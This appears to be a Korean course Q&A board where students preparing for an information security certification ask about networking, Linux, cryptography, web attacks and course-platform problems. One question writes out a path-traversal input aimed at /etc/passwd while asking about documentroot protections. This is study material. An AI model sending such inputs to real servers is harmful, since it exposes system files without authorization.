DNS에서 재귀적 질의라고 나오는데 이게 반복과 차이가 뭔가요 ? 재귀 의미도 다시 호출한다는 의미에서 반복 같은데 어떻게 차이가 있는지 궁금합니다. 그리고 재귀적질의 허용할 경우 Recursive dns서버의 캐시에 해당 도메인의 ip 주소를 받아 와서 응답을 주는거고(이때 만약에 캐시에 해당 도메인의 ip주소가 없다면, 반복질의로 ip주소 얻어서 응답해주는 건가요?) 마지막으로 재귀적 질의 제한 할 경우 Recursive dns서버의 캐시에 해당 도메인의 ip주소가 있어도 응답을 주지 않는 걸로 이해하면 되는 걸까요 ? 답변부탁드립니다. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
find 명령에서 빠른논리 연산 문의
안녕하세요! 강의 잘 듣고있습니다. 다름 아니라 find 명령에 대해 궁금한점이 있어서 문의드려요 find 명령에서 빠른연산이 적용되어서 괄호를 적용한다고 하셨는데요 예를 들어, -exec 와 같은 조건이 붙지 않는 경우에는 find 에 입력된 조건이 순차적으로 적용되는 것으로 알려주셨는데요 위의 조건이 없는 경우에는 왜 빠른 연산이 동작하지 않는지 궁금해서 문의 드려요 제가 이해한 게 아래와 같은데 올바를지 문의 드려요 원래 find 명령이나, 기타 모든 명령은 옵션을 순차적으로 적용하는 것이 일반적인데, 명령어의 특수한 조건(예. find 명령에서 -exec, -print 등)이 붙으면 빠른 연산이 적용되는 거다. 로 이해해도 될까요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
재수강 관련 질문
강의 종료 기간이 다가와서 재수강을 할려고 합니다. 재수강 시에 할인이 적용된다고 하는데 할인적용은 어떻게 하는건가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
traceroute/tracert 관련 질문 및 2023 강의 관련 질문
안녕하세요. 좋은 강의 정말 잘 듣고 있습니다. 항상 감사합니다. 공부 중 질문과 더불어 2023 강의가 나와 질문 드립니다. 1. traceroute 를 통해 각 중계노드 (라우터, l3 스위치)의 네트워크 상태를 확인 할 수 있는데, 만약 최종 목적지에서 shotdown이나 문제가 생길 시 전달 해주는 icmp 메시지도 다를 것 같습니다. 그래서, 만약 shutdown이 발생할 경우, type3 code1 메시지가 발생할 것 같은데 맞는지 확인 부탁드리고자 합니다. 혹여 서버가 특정 문제가 있을 경우, 교재의 주요 icmp error 메시지 이외 다른 메시지가 있는지 궁금합니다. 2. 최초 공부를 시작할 때는 2023 강의가 나오지 않아 2022교재 및 2022 강의로 수강 하고 있었습니다. 2023강의와 2022의 강의수도 차이가 있는 것같은데 혹시 2022 강의와 다르게 2023에서 신규로 추가된 강의 등이 있다면 들으려고 합니다. 이에 대한 강의 목차나 커리큘럼에 2022에 포함 되지 않은 강의가 있는지 알려주시면 감사하겠습니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
디피헬만 키교환 알고리즘 관련 질문입니다.
1. 디피 헬만알고리즘은 암호화 기법중에 대칭키 (비밀키)암호화 방식인가요 아니면 비대칭키(공개키) 암호화 방식인가요 2. 디피헬만 알고리즘에서 mod연산 두번하면 하나 사라진다고 하셨는데 이게 정확히 왜 사라지는지 이해가 잘 안됩니다. 3. 디피헬만에서 키 교환을 한다는 것의 의미가 엘리스와 밥이 p,g,난수 a로 연산한 공개키를 서로 교환한다고 해서 키교환 이라는 건가요 아니면, 서로의 공유키를 통해 동일한 비밀키를 갖게 되어서 공유하게 된다는 건지 궁금합니다. 4. 마지막으로 서로의 공통의 비밀키를 갖게 된다고 할 경우 결국 비밀키(개인키)가 같아져서 대칭키(비밀키) 알고리즘이 되는 건지 궁금합니다. 이해가 잘 되지 않아 질문을 쓰면서 길이 너무 길어졌습니다. ㅜㅜ 답변 부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
세션 하이재킹 관련 질문
안녕하세요. 강의 정말 잘 듣고 있습니다. 수강 중, 질문 사항이 생겨 질문 드립니다. 질문 : 세션 하이재킹의 경우, 공격자가 서버측으로 더이상의 패킷을 조작하여 전달 하지 않는다면 실제 client와 server의 ACK 교정 패킷 과정이 궁금합니다. client는 이전에 보낸 seq, ack, len을 보내고 server 역시 이전에 보낸 seq, ack, len을 보내는 과정에서 각 host가 주장하는 패킷이 다른데 어떻게 교정이 되는지 궁금합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
none
none
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
96강 질문드립니다
안녕하세요 이런 질문수준이 어떨까 싶지만 질문드립니다! "\.gz$" 라는 게 .gz 확장자를 가진 파일에 대한 의미라고 이해했는데 96강에 robots.txt 설정을보면 /*.pdf$ 라고 나와있습니다 정규표현식을 사용할 때와 안할 때가 따로 있는 것인가요? 어떻게 이해하는게 올바르게 이해한 것인지 헷갈립니다
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
노트북 새로샀는데 플레이가 안됩니다.
구 노트북이랑 휴대폰에 Kollus 전용 플레이어 설치해서 잘 보다가 노트북을 새로 사고 전용 플레이어도 새로 설치해서 보려고 하는데 Code 8464 에러와 함께 '사용 가능한 기기 대수가 초과되었습니다'라고 에러 메시지가 뜨네요. 그래서 플레이어도 재설치하고 웹 브라우저 캐시도 제거하고 재부팅까지 해봤는데 계속 이렇게 뜹니다. 구 노트북은 윈도우10 + 크롬 브라우저고 새 노트북은 윈도우11 + 크롬 브라우저입니다. +) Edge 브라우저도 시도해봤는데 계속 안되고 있습니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
네트워크 쪽 질문 2가지입니다.
1. 교재 132P에 2계층 공격중에 ARP스푸핑 설명해주셨는데, arp프로토콜은 3계층 프로토콜로 알고 있는데 이거는 3계층 관련된 공격이 아닌가요? 제가 이해를 잘못하고 있는거 같기도 하고 ㅠㅠ 2. osi 7계층의 내용은 잘 알겠는데 실질적으로 데이터부(payload)부분에 헤더(데이터 링크 계층같은 경우는 헤더+트레일러)를 하나씩 달면서 하위 계층으로 보내면서 데이터의 이동 되는 것으로 알고 있는습니다. 그런데 제가 궁금한 것은 2계층 인접노드간의 프레임 전송, 3계층 종단 노드간의 패킷전송, 4계층 종단노드 간의 세그먼트 전송이 과정이 송신측에서 데이터 캡슐화를 통해 수신측에 도달해서 역캡슐화를 진행하면 상위계층으로 올라간다고 하는데, 이미 데이터가 송신측에 도착해 있는데 경로 2계층 3계층 4계층을 이용한 전송이 어떻게 이루어지는 건지 그림이 잘 그려지지 않습니다. 즉 osi7계층의 송신측에서 수신측으로의 정확한 데이터 흐름이 궁금합니다. 기본적인 부분인거 같지만 이해를 위해 질문드립니다. ㅜㅜ (p.s 혹시 송신측에서 캡슐화 후 수신측 최하 계층에 도달한다는 것이 외부 네트워크로 도달 한다고 생각하면 되는건지요?)
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 재생 불가 관련
안녕하세요? 담당자님, 2022 정보보안(산업)기사 실기대비 강의와 관련하여 135강, 139강, 140강이 재생되지 않아 문의드립니다 (메시지:컨텐츠를 불러오는데 실패했습니다. 서비스 제공 업체에 문의하여 주시기 바랍니다.) 확인 부탁드리겠습니다. 감사합니다
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
비전공자인데 kiwi99 대신에 ^kiwi99를 쓰시는 이유가 무엇인가요?
명쾌하고 친절하신 강의 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
flooding 공격
udp flooding은 네트워크 대역폭 소진 공격, tcp flooding는 서비스 자원 소진 공격으로 분류가되는데 tcp flooding 공격또한 네트워크 대역폭 소진 공격을 예로 80번 포트로 보내어서 flooding 공격을 할수있긴하나 네트워크 대역폭 공격할거면 udp로 하는게 더 효과적 빠르고 세그먼트가 일어나지 않아서 tcp로는 대역폭 공격은 효율적이지 않기에 하지 않는다고 생각하면 될까요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
스위치 재밍
스위치 재밍시 공격자의 mac 주소를 arp 패킷에 담에 계속 보낸다고 했는데 여기서 Request인지 Reply 상관없이 arp 패킷이 해당 포트에서 통과되면 스위치 mac table에 자동으로 해당 mac 주소를 인지하는건가요??
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
시스템기본학습_3강 문의
정리하신 강의자료를 받을 수 있을까요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
wget 관련
wget 명령어는 서버측, 공격자측에서 모두 가능한가요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의목차
수고 많으십니다. 강의목차가 다른데 오리엔테이션깨문인지? 그렇다면 오리엔테이션도 하나의 수업 인데.. 아니더라도 이것때문에 헷갈리는 단점이 훨씬 큰거같네요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
6강 질문드립니다
33분 40초 쯤에 선행조건이 false가 돼서 후행조건을 연산한다고 하셨는데 선행조건(-perm -4000)은 setuid와 setugid가 만족하니까 true 아닌가요?? 갑자기 false가 돼서 후행조건을 연산하는게 이해가 안됩니다...
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
SPF 관련 문의입니다
공격자가 발신 IP를 SPF에 등록된 IP로 스푸핑 후 메일을 발송하면 수신메일서버는 정상 메일로 인식하고 수신할 수 있나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
[99강] SSL/TLS 질문
안녕하세요. 좋은 강의 제공해주셔서 잘 듣고 있습니다. 99강 들으면서 궁금한 게 생겨 질문 드립니다. 1. 사설 SSL 인증서가 설치된 서버에 접속을 하면 "이 사이트는 안전하지 않습니다."라며 경고창이 나옵니다. 경고창 확인 후 웹사이트에 접속하여 통신을 하게 되면 SSL 통신이 적용이 되는 건가요? 2. SSL 인증서의 폐지 여부를 검사하는 것은(CRL, OCSP) SSL 통신 중 언제 진행하는 건가요? 만약 폐지된 인증서라면 보안 경고창이 나오는건가요? 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
에러메시지 내 정보 노출
95강 50분 56초 보면 '403 Forbidden' 에러메시지 내에 Apache, PHP, OpenSSL 등의 버전이 노출되어 있는데 이 경우도 정보노출 취약점이라고 볼 수 있나요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
트로이목마와 논리폭탄의 차이
문제를 풀다보니 트로이목마와 논리폭탄의 차이가 정리가 되지 않아서요 자기복제가 없고 특정조건에서 악의적인 행위가 발생한다는 것을 문제를 보면 두 개 모두 해당하는 것 같아서 구분할 방법이 있는지 궁금합니다 ㅎㅎ
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
사용 가능한 기기 대수가 초과되엇다고 떠요
현재 테블릿 1이랑 노트북 1이랑 잘 사용하고 있는데 갑자기 이러네요
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
secure 속성 추가시 문의입니다.
secure속성을 추가하면 https 통신이 아니면, 클라이언트에서 세션ID를 보내지 않는다고 배웠습니다. 그러면 그전에 서버에서 세션ID를 set-cookie로 secure 속성과 함께 클라이언트에게 보내줄때, 스니핑이 가능하면, 탈취한 세션 ID로 접속이 가능한건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
정보보안기사 실기 이론편 2권 p.375
강의 85 웹 어플리케이션 취약점_09 동영상의 34분 30초 대응책과 달리 실기 2권 P.375 아래 대응책에 보면 (e.g. ;, && 등)이라고 되어있습니다. 책의 인쇄 오류인가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 공부 문의..
안녕하세요 이번에 꼭 정보보안기사 시험을 합격하고 싶은 수강자 중 한명입니다. 선생님이 들어주신 강의를 다 소화하고 교재를 1회독하여 중요한 부분들을 제 말로 해서 잘 정리하고 나면 문제지를 중심으로 2회독 하고 마무리하여 시험에 임하려고 하는데 괜찮을까요..? 문제지를 중심으로 하는게 마지막 마무리에 좋을지가 정말 궁금합니다..!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
모바일 수강 문의 오류
안녕하세요 모바일 수강으로해서 강의 수강하려고 하는데 사용 가능한 기기 대수가 초과되엇다고 뜨네요! 제가 휴대폰 바꾼지가 6개월정도 지났는데 휴대폰 번호는 그대로여서 문제 없을줄 알았는데 그거 때문에 그런거 같아서요. 모바일 기기 등록 초기화 부탁드립니다!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
131번 mtime 옵션 질문드립니다.
131번에 최근 10일동안 생성된 파일을 찾는데 옵션이 -10으로 되어있습니다. 이렇게 되면 마지막 수정일이 10일 미만인 파일을 검색하게 되어 9일동안 생성된 파일이 조회될 것 같은데, 10으로 옵션을 줘도 괜찮은건가요? 그리고 ctime은 파일생성과는 무관한 속성인지더 궁금합니다!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
교재 정오표는 어디서 볼 수 있을까요?
조금씩 교재에 오타가 보이네요. 교재 정오표는 어디서 볼 수 있을까요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 중 전자필기장(연습장) 필기 부분
강의 중 전자필기장의 연습장이라는 탭, 필기 내용은 제공이 안되는 것인가요?.. 공부에 도움이 될것같아 요청드립니다.!!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
52강 네트워크기본학습_21 RST ACK 언급부분
18분 쯤 위조된 IP로 공격진행 중 진짜 존재하는 IP가 있다면 SYN+ACK 에 대한 응답으로 RST+ACK 응답이 온다고 하셨는데 ACK NUM이 있는 경우 이를 Seq Num으로 설정한 후 RST를 전송한다고 TCP 표준에 따른 동작방식 설명중 해주셨던걸로 기억합니다. 혼란스러워서 어떤게 맞는것인지 확인 부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 수강해도 완료 표시가 되지 않습니다.
태블릿으로 듣고있는데 다 들어도 완료체크가 안되네요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 수강정지
안녕하세요 결제를 하는순간 바로 수강90일 시작인가요? 아직 교재를 수령하지않아 수강을 시작하고 싶지않은데 정지 부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
모바일 강의 수강 문의
모바일 강의 수강은 이제 어떤 어플을 깔아서 들어야 하는지 확인부탁드립니다!
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의에 사용했던 연습장은 배포 안하시는지요??
연습장 내용을 받을 수 있나 궁굼합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
링크가 정상적이지 않습니다.
커리큘럼 클릭시 다른 강의로 연결됩니다. 팝업이 뜨고 나서 들어야 할 강의를 찾아야 합니다. 네트워크 기본학습_01의 강의자료가 존재하지 않습니다. ㅠ 무엇보다도 동영상 플레이어 솔루션 교체 작업은 보안기사 실기시험이 종료되고 해야 하지 않을까요? 불편함이 큽니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
왜 자꾸 강의가늘어나요?
총 강좌수가 자꾸 늘어나니깐 날짜 베분을 못하겠어여 왜 자꾸 늘어나요
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 일시정지 신청
안녕하세요. 강의를 잠깐 못들을꺼같아서 일시정지신청하려고하는데 할수 없나요? 저번에는 제가 사용했던거 같아서 말씀드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
크로스사이트스크립트 질문입니다!
안녕하세요, Reflected XSS 공격방식이 URI의 파라미터 값에 악성 스크립트가 포함되어있어, 사용자가 클릭하면 실행된다고 알고 있습니다. POST방식은 파라미터가 url에 없는데, 어떻게 사용자에게 악성스크립트를 유도할 수 있는걸까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
뒤로가기 건의
강의듣는 도중 뒤로가기를 하면 강의목록이 와야하는데 그 전페이지로 이동되네요 불편한점 건의해봅니다
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
Mac에서 사용 강제되는 Kollus Player 진도 반영 안됩니다
Mac에서 사용 강제되는 Kollus Player를 이용해 강의를 들을 경우 진도율에 반영이 되지 않습니다. 이제까지 무슨 강의를 들었는지 확인되지 않아 강의 수강 시 난처함이 있습니다. 보완 부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
플레이어 왜바꿨는지 모르겠는데
플레이어 바뀐 이후로 강의를 들어도 몇분 들었는지 체크도 안되고 다 들어도 완료 표시가 안됩니다 개선좀 해주세요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
pc에서 동영상 수강후 5분후 모바일 수강시 오류
pc에서 동영상 수강후 5분후 모바일 수강시 오류가 발생됩니다. pc에서 모바일 이동 수강시 인터벌 시간이 필요한지 궁금하네요. .................................................................... (상담후) 현재 조치 완료된 사항입니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
No.130 주요 취약점 강의가 No.131 주요 취약점 강의와 같습니다.
둘 다 NTP 분산 서비스 거부 취약점 다루고 있고, SSL/TLS 관련 취약점 내용은 빠진 것 같아요.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의에서 사용하는 별도 자료
안녕하세요. 강의중에 별도로 설명해주는 [자료]도 공유가 되는건지여? 공유가 되는거라면 어디서 확인 가능할까요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
진도 트래킹 2
안녕하세요. 음 아니요, 105강까지는 플레이어가 바뀌기 전에 트래킹 된 내용이구요. 플레이어가 바뀌고 110강까지 수강했는데, 계속 105강으로 나온다는거는 트래킹이 안되는거잖아요;;..
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
진도 트래킹
제가 110강까지 들었는데, 답변주신 내용처럼 표시가 안되는데요. 다시 확인 부탁드립니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
section 31 동영상 화면 안나옵니다
조치부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
플레이어 바뀐 이후로 section 트래킹
안녕하세요. 강의 잘 수강하고 있습니다. 플레이어가 바뀐 이후로, 강의 들은 것에 대한 진도 트래킹이 안되는 것 같아요. 106강을 들었는데, 들었다는 표시가 이전처럼 안되네요. 개인적인 사유로 강의를 모두 완강하고 나면, 수료증을 발급 받아야 하는데 이런 경우는 어떻게 되는건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
정보보안일반관리(신규) 강의 시 교재로만 강의 하시는지 아니면 강의자료로 하시는지 궁금합니다.
암호학적 강의자료가 너무 적어서 강의하시기에 부족한 점이 있을것 같은데요 추가적인 강의자료 없는지요
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의가 계속 다운로드 안됩니다
확인부탁드립니다 벌써 몇일째 안됩니다. 그래서 스트리밍으로보는데.....왜 안되는건가요. 다운로드는.....이전꺼보다 못하네요.....플레이어가
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
완강문의
안녕하세요 142강이 완강인건지 말씀부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
센션 31
섹션 31강 윈도우 서버 취약점에 전시간 강의 내용이 플레이됩니다
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
section 109 강의가 재생이 안돼요
section 109 강의가 재생이 안돼요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의가 중복됩니다.
section 15 강의와 section16강의가 똑같은강의가 나옵니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
와.. 강의 플레이어 바뀌고 비율 완전 이상해졌네요.
전체모드 안하면 완전 작아지고 전체 모드 해도 예전같은 비율이 아니네요 플레이어 선택 잘못한듯...
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의 다운로드가 안됩니다
불편하네요..ㅠㅠ
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
chkrootkit 질문입니다.
chkroot 원리가 /proc에 있는 프로세스들과 ps의 결과가 다르면 ps가 변조된 것이라고 하셨는데, netstat와 ls같은 명령어들이 변조 됐다는 것은 어떻게 탐지하는 걸까요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
documentroot 관련 질문입니다.
1.documentroot가 /var/www/html 이고, url에서 ../ 식으로 documentroot의 상위 디렉터리로 이동할 수 없다면, 보안취약점조치 가이드에 ../와 같은 상위디렉터리 접근 제한 설정이 왜 권고되는 걸까요? ../ 없이 url에 그냥 디렉터리명만 적으면 될것같습니다. ex) www.naver.com/test/test1/aa.jpg 라면 www.naver.com/test/test1/../ 식 말고 www.naver.com/test/ 로 접근 url에 ../../../../../etc/passwd 등의 식으로 documentroot의 상위 디렉터리가 접근이 불가능하다면 ../와 같이 상위 디렉터리 접근이 제한이 설정되어야 하는지 궁금합니다. 2. 파일 다운로드 취약점 중에 filepath 파라미터값에는 documentroot 상관없이 documentroot의 상위 디렉터리에도 접근 가능한데, 파라미터로는 documentroot의 상위 폴더에 접근이 가능한걸까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
TCP SYN Flooding 대응책 질문
23년 실기교재 p.217에 TCP SYN fooding 대응책 부분에서 방화벽 또는 DDoS 대응장비를 이용하여 동일 Client(IP)의 연결(SYN) 요청에 대한 임계치 설정을 통해 차단 한다고 되어 있습니다. 그 앞장에서 실습 캡처한 그림들을 보면 출발지 IP를 다 위조하여서 다른 IP로 SYN을 보내게 되는 걸로 확인이 됩니다. 동일 IP에 대해 임계치 설정을 통해 차단을 해봐야 아무 상관없이 공격이 진행 되는 게 아닌가요...? 이 부분에 대해서 제가 이해가 잘 안 되어서 질문 드립니다. 감사합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
정보보안산업기사도 강의를 모두 들어야 하나요?
강의중 기사와 산업기사가 나뉘어 있는지 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
'106. 데이터베이스 보안' 내용 중, 'default root 패스워드 변경' 항목의 쿼리 관련으로 질문 드립니다
MySQL 실습을 개인적으로 진행하며 강의를 듣던 도중 update user set password=password('바꿀 비밀번호') where user='root'; 가 작동하지 않아 찾아보게 되었습니다. 그런데 MySQL 5.7.6 이상의 버전 부터는 ALTER user 'root'@'localhost' identified [with caching_sha2_password] by '바꿀 비밀번호'; 로 쿼리가 변경되었다는 내용을 보았는데 ( https://8ugust-dev.tistory.com/10 , https://sysdocu.tistory.com/1547 ) 두 가지 스타일 모두 알고 있는 편이 좋을지, 혹시 만약에 실기에서 해당 내용이 출제되었을 경우 동영상 내용대로만 기재해도 지장이 없을지 선생님의 고견을 여쭙고자 합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
지안패스
지안패스 이용중입니다. 실기 2023강의가 올라왔는데 지안패스로는 왜 2022, 2021 실기강의만 가능한지 궁금합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의촬영 (완강) 문의
언제쯤 강의 촬영이 완강될까요? 한꺼번에 교육자료뽑아서 공부하려고하는데 언제쯤 완강되는지 그리고 강의수는 몇개인지 확인부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
커리큘럼 문의
안녕하세요 커리큘럼 문의 드립니다. 정보보안 일반에 대한 강의는 따로 이루어지지않은건가요? 아니면 촬영중에 있는지 확인 부탁드립니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
포렌식 연계보관성
교재에서 연계보관성의 각 단계는 증거수집, 이송, 분석, 보관, 법정제출이라고 본것 같은데 문제집 p.491 766번 문제 답에는 증거 수집, 이송, 보관, 분석, 법정 제출로 나와있습니다. 보관과 분석은 서로 위치가 바뀔수 있는 것인지 궁금합니다.
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
AH 프로토콜 전송모드 질문
안녕하세요 AH프로토콜을 공부하면서 헷갈리는게 있어 질문드립니다. 우선 전송모드는 페이로드를 캡슐화 하는걸로 알고있습니다. AH/전송모드 캡쳐화면에서 ICMP 메세지가 스니핑이 되는 이유는 무엇일까요?(평문까지 내용을 볼수 있는이유) 물론 평문으로 데이터가 보이는건 AH가 암호화를 지원하지 않기 때문인것은 이해했습니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의랑 교재 순서가 달라요
section22 강의가 교재 80에서 시작하는것이 아니라 85페이지부터 시작해요(80~85강의가 누락된거 같아요) 그리고 section22와 23이 같은 영상인거 같아요 확인 부탁드릴께요
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
강의가 두개 인데
2022, 2023 두개 인데다 강의수가 2023년이 훨씬 적은데 2023년 버전만 들으면 되는건가요?
2023 정일영 정보보안(산업)기사실기 최신 강의 [교재별도]
FCS의 위치
네트워크 데이터링크 강의 보고 잇는데요. 프레임 구조에서 끝에 FCS(CRC)가 4바이트 붙는다고 하는데 와이어샤크에서 아무 패킷 확인해보면 FCS 부분이 안보여요. 사진상에서 보는 건 TCP 패킷이니까 TCP 페이로드 뒤에 FCS가 있어야 하지 않나요?? "프레임 헤더 + 프레임's payload(IP 패킷 + TCP 세그먼트) + FCS" 이렇게요. 실제로는 뒤에 4바이트가 붙는데 와이어샤크에서 그냥 안보여주는건가요??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
중요파일 접근권한 설정에 대해
중요 파일 접근권한 설정 부분 보고있는데요. /etc/shadow는 루트가 소유자여야 하고 접근권한은 소유자만 읽기, 나머지는 권한 없음(400)으로 설정해야 한다고 나와 있는데요. 그런데 애초에 /etc/shadow의 소유자가 루트로 설정되어야 한다면, 소유자 접근권한(rwx)은 의미가 없는거 아닌가요? 어차피 루트는 접근권한이랑 상관없이 모든 파일을 삭제 수정 가능하니까요. 그런데 왜 소유자 권한은 4로 설정해야 된다고 하는 건가요? 어차피 의미가 없는 것 같은데.. 설명 부탁드립니다 ㅠㅠ
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 결재한 수강생 입니다. 23년 실기 대비 관련
고생 많으십니다. 필기 공부와 병행해서 실기 공부를 하고자 하는데, 실기 영상은 22년도네요? 23년 실기대비 상관이 없나요? 그리고 영상이 최신화 된다면 교재와 같이 언제즘 최신화가 될지 궁금합니다. 감사합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 자료는 어디에서 받을 수 있나요?
실기교재는 가지고 있는데. 실기 강의하시면서 별도로 자료로 보여주시는 자료의 파일은 어디에 올려있나요? 예를 들어, 10강의 사용자 계정 관련 자료 같은거요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 다운로드가 매우 불편합니다.
해결방법을 문의 드립니다. 첨부한 화면처럼 자꾸 창이 뜹니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
터미널 제어권 전환에 대한 질문
안녕하세요. 9강에서 터미널 제어권 전환에 대해 이해가 안가는게 있어서 질문 드립니다. 첨부한 스크린샷 보면, 로그인 쉘에서 a.out을 실행할 때 a.out에 대한 새로운 프로세스 그룹이 형성되면서 터미널 제어권이 넘어간다고 설명하시는데요, a.out은 이전 예제 프로그램으로 fork를 통해 자식프로세스를 생성하는 프로그램입니다. 제가 이해가 안가는건, a.out이 fork로 자식 프로세스를 생성할 때도 새로운 프로세스 그룹이 형성되어야 하는 것 아닌가 해서요. 실제로 a.out을 실행해서 확인해보면 a.out의 자식프로세스는 a.out이랑 PGID가 동일합니다.(test가 a.out 입니다) 왜 a.out이 생성한 자식프로세스는 a.out과 동일한 PGID를 갖는 것인지 궁금합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
logrotate create 옵션
교재에 logrotate.conf 옵션 중 create 옵션은 순환 시 새롭게 로그파일을 생성한다고 나와있는데 이때 새롭게 생성하는 로그파일은 순환로그 파일을 의미하는건가요? 질문 받아주셔서 감사합니다!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
xinetd 서비스별 설정파일
질문1) xinetd 서비스별 설정파일 필드 중 instances 가 동시에 서비스할 수 있는 서버의 최대 개수라고 설명되어 있는데 여기서 서버를 서비스 프로세스라고 생각해도 될까요? 질문2) 동시에 서비스 할 수 있는 서버의 최대 개수라는 의미가 만약 서비스명이 ftp면 ftp 서비스에 대해서 동시에 서비스 할 수 있는 서버의 최대 개수인건가요? 제가 이해한게 맞는지 잘 모르겠네요...ㅠㅠ 질문 받아주셔서 감사합니다
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
chmod 권한
안녕하세요 질문 2개 하려고 합니다. 질문1) 교재에 chmod go-w daemon.c의 의미가 daemon.c의 group, others에 w 권한 제거라고 되어 있는데 daemon.c를 사용하는 모든 group과 others에 대해 w 권한 제거라고 이해해도 괜찮을까요? 질문2) 여기서 말하는 group이 리눅스 시스템에 존재하는 모든 그룹을 말하는 것인가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
snort 룰 질문드립니다.
Snort 룰에서 content가 여러개 있을 때, 항상 앞의 문자열이 매치된 이후부터 다음 검사가 시작되는건가요? 예를 들어 content:"aaa"; content:"bbb"; content:"ccc"; depth:3; 이면 1) aaa 탐지하고, aaa가 매치된 위치에서부터 bbb 탐지하고, bbb 끝난 위치에서 3바이트 이내에 ccc 매칭하고 이런 의미인지, 2) 아니면 aaa 검사, bbb 검사, ccc검사 모두 독립적으로 전체 페이로드에서 검사하고, ccc의 경우는 첫 바이트부터 3바이트 범위내로 검사하고 그런 의미인지
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
보안장비 관련 질문 드립니다.
